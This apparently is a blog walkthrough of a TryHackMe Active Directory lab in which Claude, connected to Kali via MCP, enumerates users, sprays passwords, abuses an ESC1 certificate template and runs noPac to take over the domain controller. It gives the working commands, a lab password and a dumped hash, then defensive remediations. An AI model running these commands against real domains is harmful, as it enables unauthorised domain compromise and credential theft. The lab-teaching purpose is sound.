AI-Assisted Penetration Testing: A TryHackMe Lab Walkthrough with Claude
Disclaimer: This walkthrough was performed entirely within a TryHackMe lab environment.
Introduction
This post documents the successful attack paths, tools used, and findings from the engagement as an example of the future of CTF type events.
Lab Setup
- Kali Linux at
192.168.50.152running an MCP server, giving Claude direct tool access - Target:
10.65.181.232— Windows Server 2019 Domain Controller, domainlunar.eruca.com, hostnameLUNDC, accessed via OpenVPN tunnel ontun0
Claude had access to the following Kali tools via the MCP connection:
execute_command— arbitrary shell executionnmap_scan— network/port scanningnxc(NetExec) — SMB/LDAP/WinRM enumeration and exploitationimpacketsuite — secretsdump, GetNPUsers, findDelegationcertipy— ADCS enumeration and exploitationkerbrute— Kerberos username enumerationldapdomaindump— LDAP enumeration
The Engagement: lunar.eruca.com
Connecting via VPN
The target required routing through an OpenVPN tunnel on tun0. Claude identified the missing route and added it directly:
ip route add 10.65.181.0/24 via 10.13.0.1 dev tun0
With connectivity established, Nmap confirmed open ports:
88/tcp open kerberos-sec
389/tcp open ldap
445/tcp open microsoft-ds
3389/tcp open ms-wbt-server
Hostname: LUNDC | Domain: lunar.eruca.com
Username Enumeration with Kerbrute
With no null sessions and no AS-REP vulnerable accounts, Claude pivoted to Kerbrute — using Kerberos AS-REQ pre-authentication probes to enumerate valid usernames without any credentials:
/opt/kerbrute/kerbrute_linux_amd64 userenum --dc 10.65.181.232 \
-d lunar.eruca.com /usr/share/seclists/.../names.txt -t 50
Valid users discovered:
alane, bowen, cali, callen, elane, kali, mali, ryoung, administrator, thm
Password Spray — Getting a Foothold
Claude sprayed the valid user list with candidate passwords, landing a hit on thm:
[+] lunar.eruca.com\thm:Password1@
Checking thm’s access revealed Domain Admin-level privileges with C$ READ/WRITE — full filesystem access to the DC.
ADCS Enumeration — ESC1
Claude used NetExec’s ADCS module to identify the Certificate Authority:
Found PKI Enrollment Server: LUNDC.lunar.eruca.com
Found CN: lunar-LUNDC-CA
Then Certipy revealed two ESC1-vulnerable templates:
certipy find -u thm@lunar.eruca.com -p 'Password1@' \
-dc-ip 10.65.181.232 -stdout -vulnerable
Both HTTPSWebServer and UserRequest templates allowed any authenticated user to supply an arbitrary Subject Alternative Name (SAN) with no manager approval required — a textbook ESC1 misconfiguration.
Exploiting ESC1 — Certificate-Based Admin Impersonation
Step 1: Request a certificate for administrator@lunar.eruca.com as the low-privilege thm user:
certipy req -u thm@lunar.eruca.com -p 'Password1@' \
-ca lunar-LUNDC-CA -dc-ip 10.65.181.232 \
-template UserRequest -upn administrator@lunar.eruca.com \
-out /tmp/admin_cert -dcom
[*] Got certificate with UPN 'administrator@lunar.eruca.com'
[*] Saving certificate and private key to 'admin_cert.pfx'
Step 2: Authenticate with the certificate to retrieve the administrator’s NT hash:
certipy auth -pfx 'admin_cert.pfx' -dc-ip 10.65.181.232 \
-domain lunar.eruca.com -username administrator
[*] Got TGT
[*] Got hash for 'administrator@lunar.eruca.com':
aad3b435b51404eeaad3b435b51404ee:400da5ca40476e5aa7d2dbf542c6e5c3
From a standard domain user to a Domain Admin certificate and NT hash — no elevated privileges required at any point.
Misconfiguration Audit
Claude ran a comprehensive misconfiguration sweep using NetExec modules, impacket, and manual checks. The results were striking:
| Misconfiguration | Severity | Impact |
|---|---|---|
| ESC1 — ADCS vulnerable templates (x2) | 🔴 Critical | Any auth user → DA via certificate |
| ZeroLogon (CVE-2020-1472) | 🔴 Critical | Unauthenticated → DA |
| NoPac (CVE-2021-42278/42287) | 🔴 Critical | Domain user → DA via sAMAccountName spoofing |
| Unconstrained Delegation on DC | 🔴 Critical | Coerce + capture admin TGT |
| 5× Coercion vectors (PetitPotam, PrinterBug, DFSCoerce, MSEven) | 🟠 High | Force DC auth → relay/capture |
| Print Spooler running on DC | 🟠 High | PrinterBug / PrintNightmare enabler |
| MachineAccountQuota = 10 | 🟠 High | Enables NoPac and RBCD attacks |
| No account lockout policy | 🟡 Medium | Unlimited password spraying |
Service accounts with DA rights (svc.gitlab) |
🟡 Medium | Lateral movement pivot |
| No Fine-Grained Password Policies | 🟡 Medium | Weak passwords on privileged accounts |
NoPac — sAMAccountName Spoofing to Domain Admin
With NoPac confirmed vulnerable, Claude ran the exploit using the thm credentials:
python3 /opt/noPac/noPac.py lunar.eruca.com/thm:'Password1@' \
-dc-ip 10.65.181.232 -dc-host LUNDC \
--impersonate administrator -dump -just-dc-ntlm
NoPac works by:
- Creating a machine account (MAQ = 10 allows this)
- Renaming it to match the DC’s sAMAccountName (
LUNDC) - Requesting a TGT before the DC appends
$to the name - Using CVE-2021-42287 to obtain a service ticket as
administrator - Running DCSync to dump all hashes
Key Takeaways
Attack Chain Summary
Kerbrute enum → Password spray → ESC1 cert request → Admin NT hash + TGT → NoPac DCSync
What Made Claude Invaluable
-
Contextual awareness — Claude didn’t just run tools blindly. When Nmap showed ports 88, 389, and 445, it immediately identified the target as a DC and adjusted the attack strategy accordingly.
-
Adaptive troubleshooting — When RPC enrollment failed for Certipy, Claude diagnosed the issue, tried DCOM, and succeeded. When clock skew broke Kerberos auth, Claude fixed it on the fly.
-
Proactive enumeration — Claude suggested AS-REP roasting, Kerberoasting, delegation checks, and the full misconfiguration audit without being asked — bringing real penetration testing methodology rather than just executing commands.
-
Attack chaining — Claude naturally connected findings into full attack chains, e.g. recognising that ESC1 + authenticated user = DA without needing explicit instruction.
-
Speed — What might take hours of manual work — recon, spray, enumeration, ADCS analysis, exploitation — was accomplished in a single focused session.
Defensive Recommendations
For anyone running AD environments, the findings here map to clear remediations:
- ADCS: Audit all certificate templates. Disable
EnrolleeSuppliesSubjectunless strictly required. Enable manager approval on sensitive templates. - NoPac: Apply KB5008380 / KB5008102. Set
MachineAccountQuotato 0 for non-admin users. - ZeroLogon: Apply the August 2020 security update (KB4557222) and enforce secure channel.
- Delegation: Remove unconstrained delegation from all accounts. Use constrained or resource-based constrained delegation only.
- Coercion: Disable Print Spooler on DCs. Apply patches for PetitPotam and DFSCoerce vectors.
- Password policy: Enforce minimum length (14+ chars), complexity, history, and account lockout (5–10 attempts).
- Service accounts: Remove DA rights from service accounts. Use Group Managed Service Accounts (gMSA).
Conclusion
This session demonstrated that Claude, connected to a Kali Linux machine via MCP, is a genuinely capable penetration testing assistant. It doesn’t just execute commands — it thinks through the engagement, adapts to failures, chains findings into attack paths, and explains the methodology along the way.
For security professionals and students working through AD labs, this kind of AI-assisted workflow dramatically accelerates learning and execution. Every command was reasoned, every finding was contextualised, and every next step was suggested proactively.
The future of penetration testing tooling isn’t just better scripts — it’s better thinking. And that’s exactly what Claude brings to the table.